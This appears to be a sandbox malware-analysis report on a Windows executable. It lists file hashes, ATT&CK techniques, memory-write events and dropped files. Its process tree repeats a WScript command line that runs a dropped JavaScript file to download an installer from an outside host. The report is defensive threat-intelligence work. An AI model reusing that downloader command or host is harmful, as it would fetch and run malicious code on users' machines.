ad9830b60490a4576b35e12258d71060881a8dfb6f3d3c4653262d13fc9c5b34

Analysis

max time kernel
38s
max time network
38s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
30-09-2024 03:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe
Size

184KB
MD5

ffdd3dd2b9df472fe22273e6ab861f4d
SHA1

29f6a87adfc251212c74424c895376f1f8680c30
SHA256

ad9830b60490a4576b35e12258d71060881a8dfb6f3d3c4653262d13fc9c5b34
SHA512

e6b2aea6850bcd22d591f89f484babd4f7c713f5232049414510e8e8fa859a06ecad2e93ce971ffeeba499b295a50943a25b98eb0755f8c2d85cd1beeb67ed01
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3D:/7BSH8zUB+nGESaaRvoB7FJNndnS

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2324	WScript.exe
8	2324	WScript.exe
10	2324	WScript.exe
12	2880	WScript.exe
13	2880	WScript.exe
15	2124	WScript.exe
16	2124	WScript.exe
18	1696	WScript.exe
19	1696	WScript.exe
21	1140	WScript.exe
22	1140	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2904 wrote to memory of 2324	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	29
PID 2904 wrote to memory of 2324	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	29
PID 2904 wrote to memory of 2324	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	29
PID 2904 wrote to memory of 2324	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	29
PID 2904 wrote to memory of 2880	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	31
PID 2904 wrote to memory of 2880	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	31
PID 2904 wrote to memory of 2880	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	31
PID 2904 wrote to memory of 2880	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	31
PID 2904 wrote to memory of 2124	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	33
PID 2904 wrote to memory of 2124	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	33
PID 2904 wrote to memory of 2124	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	33
PID 2904 wrote to memory of 2124	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	33
PID 2904 wrote to memory of 1696	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	35
PID 2904 wrote to memory of 1696	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	35
PID 2904 wrote to memory of 1696	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	35
PID 2904 wrote to memory of 1696	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	35
PID 2904 wrote to memory of 1140	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	37
PID 2904 wrote to memory of 1140	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	37
PID 2904 wrote to memory of 1140	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	37
PID 2904 wrote to memory of 1140	2904	ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe	37

C:\Users\Admin\AppData\Local\Temp\ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ffdd3dd2b9df472fe22273e6ab861f4d_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2904
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8FF0.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf8FF0.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2324
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8FF0.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf8FF0.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2880
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8FF0.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf8FF0.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2124
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8FF0.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf8FF0.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1696
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf8FF0.js" http://www.djapp.info/?dotnet=4&file=installer C:\Users\Admin\AppData\Local\Temp\fuf8FF0.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
32168c285be1db0ab960211d03582e7f

SHA1
12efc4e82fc152fcf68a68f811e8f50a523d45c3

SHA256
1db2233c7f37473cea736dc499e3611b62fd0f3233d56266d9bbc59d18e0f05e

SHA512
7e02b21dc4e4989564ff68aac0f0fab9f1554c53626264f259fe4a743165fc08550588ab2206454c4a164fbb98c64123bee3cf1aa9e0d2dd99018f3f31201e07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fc71c96656a9b448ff0a137098946c63

SHA1
ddf468171ceb5d3f9e51e58ec54eca80300e7de0

SHA256
6a7c8bc8a365e67f7338418906959a82a54099b7e4ba11bad46a7c707d714fe2

SHA512
d888e10d18d97284c959796aeb7cdbf4a5d595581d2b39f136b41728732a76be8a77416926d61264f1345e1707e0676fb5017c574fbccd76aca809cbb63f0c92

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
af67966546f6a4b0abdff8fb76d27eda

SHA1
6d182286bb5f39eadf5b9e0bc18eda07e6184a28

SHA256
da2aafd952d8d0220e4d91a78234ac2a116e2a5672ad879351f3ae6722da07df

SHA512
711e4b21fc7b56e7e7a7deb3c6eef471b83a6f43a07590d18070e7adb637e1e145e9eed95df860f2858ff4a28870ecd2d3c6637494b23ff6b40f2f06027640c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0E1IWGZ4\domain_profile[1].htm

Filesize
6KB

MD5
f023995a704ca45c5f355633bcba28e4

SHA1
9b5b215bea7e8591bef8b2870a34caaa4de7b9f7

SHA256
adfda17c7dfce18dadbadf5563427f57523b833a2863dcd21718329393e09c51

SHA512
9c5f03639ba6b7752183129862a99b640cfbe2bbc544e752d8fa71b673b8cbf336db9de28c617f995b5fefde53327be7396579543cfeff527cc4936374da6281

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0E1IWGZ4\domain_profile[1].htm

Filesize
6KB

MD5
324bea7326229d498d72936c9acf00e8

SHA1
852c9dad8671983fb590ee90372ab2be74c80b2d

SHA256
33106d81dc8d84ca32e3b92bd68e65bb8286f1b1783321ed512a257f7f44e9a8

SHA512
984f193ac410aa4df92491fb525cdb43d619f32f9336544d52c57c336bbfe6006e30f2580cccb3bd03b9e1161ad09b58c179d289b6d63f5464487457feae1aa9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\domain_profile[1].htm

Filesize
6KB

MD5
f6fc41917e69b52df8620d698b1e1480

SHA1
97c881abf50445d3c03b5ad17a806225414010b9

SHA256
6ce1c852e222391219e2971e987d3643f23df3ac6ca8a588527e73e1e9f0dfca

SHA512
7cf2b128b4742220f728e31fb4d9eeaa6004f6a0534a8fad113748a20d26e99f22ec0ad2fb534cd3b0eebe8ab9fccafb927846897148a2693aa8c0f901dd02ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\domain_profile[1].htm

Filesize
6KB

MD5
742709d55a0e355da91d8da7f97b2f1c

SHA1
fab1882fbd64058346174989d087b939f83456cb

SHA256
4034603a7093091dba04004eed928248a96d5aba559c0e7dc5893d2154a1dd41

SHA512
bdc7cff380fab6e20fb31dbb7eee60fdc4dcacc73e5db19b57d523fb563d5952ee3f3be4608096a64344049f49543bfd16b39eaee3673dc8430c89e28c2fa38d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\domain_profile[1].htm

Filesize
6KB

MD5
d1a32d4a57b28188028532f90239853c

SHA1
70a1986ef9f473975bd30534c6e290f388716402

SHA256
3b548740d791ca307753299a9b64fbf239cd71af49860656173c86b28c90dba1

SHA512
f008550196dbcd555ee7978cffbce8aae5c553ce869773019d41ada7f46e265fc4134ede27f6e111a8bb19c465115cc1b392097c9abf00c2fb85ca797931bba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBFF5.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarD875.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf8FF0.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\JQU0P9UU.txt

Filesize
175B

MD5
5e1c66d3238a2e81fe3d39f697e57a4e

SHA1
d5f748f7a2bda6516fc347f3d2c544b24e5e3942

SHA256
d45a13b18f8749c609a60d93860370e777466ebb538cabb2285cefb7dd45a5d1

SHA512
9f97f686baabb38504b3a84c41d87f201d1da26f565cc5b02277ea5ae557471b7a8fad0312bd6344db0a09b243c4a217b4e58789294a65c3e33eb09a927d1bbf

Download Submit